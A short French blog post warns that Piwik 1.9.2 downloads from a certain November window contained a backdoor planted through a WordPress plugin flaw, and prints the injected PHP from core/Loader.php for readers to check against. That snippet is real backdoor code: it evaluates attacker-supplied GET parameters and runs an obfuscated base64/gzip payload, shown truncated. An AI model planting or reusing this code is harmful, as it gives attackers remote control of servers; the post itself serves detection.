Chers amis, attention si vous utilisez Piwik comme outil de stats sur votre serveur. En effet, si vous avez installé ou mis à jour vers la version 1.9.2 du 26 novembre entre 16h43 et 00h59 , il se peut que vous ayez installé une version de Piwik contenant une backdoor. Le pirate a profité d'un bug dans un plugin WordPress présent sur le serveur de Piwik pour placer son code dans les sources du projet.


Pour être certain que votre installation n'est pas piégée, ouvrez le fichier

core/Loader.php

et si vous ne voyez pas ce qui suit dedans, vous êtes tranquille.

<?php Error_Reporting(0);       if(isset($_GET['g']) && isset($_GET['s'])) {
preg_replace("/(.+)/e", $_GET['g'], 'dwm');     exit;
}
if (file_exists(dirname(__FILE__)."/lic.log")) exit;
eval(gzuncompress(base64_decode('eF6Fkl9LwzAUxb+KD0I3EOmabhCkD/
OhLWNOVrF/IlKatiIlnbIOZ/bpzb2pAyXRl7uF/s7JuffmMlrf3y7XD09OSWb
Uo9RzF6XzHCz3+0pOeDW0C79s2vqtaSdOTRKZOxfXDlmJOvp8LbzHwJle
/aIYEL0YWE$

Sinon, rendez-vous sur le blog de Piwik pour comprendre comment vous débarrasser de cette backdoor qui pourrait permettre à un pirate d'avoir accès à votre serveur.

Source

Vous avez aimé cet article ? Alors partagez-le avec vos amis en cliquant sur les boutons ci-dessous :

Pinterest Twitter Facebook Google Plus Linkedin email Flattr ! Bitcoin DogeCoin